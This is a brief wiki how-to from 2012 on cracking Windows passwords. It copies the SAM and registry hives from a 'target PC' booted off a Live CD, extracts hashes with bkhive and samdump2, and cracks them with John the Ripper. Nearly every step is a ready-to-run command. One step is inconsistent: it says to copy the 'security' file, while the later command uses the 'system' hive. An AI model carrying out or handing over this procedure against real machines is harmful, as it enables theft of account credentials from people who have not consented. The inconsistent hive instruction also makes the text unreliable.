Bkhive, samdump2, john

From Notes_Wiki
Revision as of 04:21, 13 November 2012 by Saurabh

Using bkhive, samdump2 and john to crack windows passwords

We can use bkhive, samdump2 and john to crack Windows passwords. Weak passwords get cracked within minutes using this technique.

  1. Copy 'C:\Windows\system32\config\sam' and 'C:\Windows\system32\config\security'. These files cannot be copied, even as administrator, while Windows is running, so you have to boot the target PC from a Live CD to get them.
  2. Unzip Bkhive.zip into some folder.
    Usage: bkhive systemhive keyfile
    So type the command: 'wine Bkhive.exe system keys.txt'
    Note: use Bkreg in place of Bkhive for pre-SP4 systems.
  3. Unzip Samdump2.zip into some folder.
  4. Type the command 'wine Samdump2.exe SAM keys.txt > hashes.txt'.
  5. Now use 'john hashes.txt' to crack the passwords.
  6. To see the cracked passwords later, just type 'john -show hashes.txt' in the same folder. A john.pot file in that folder makes this possible. John also stores some information in ~/.john.

Note: We can start john with 'john --session=imp' and press 'Ctrl+C' to stop it part way through. To resume, use 'john --restore=imp'.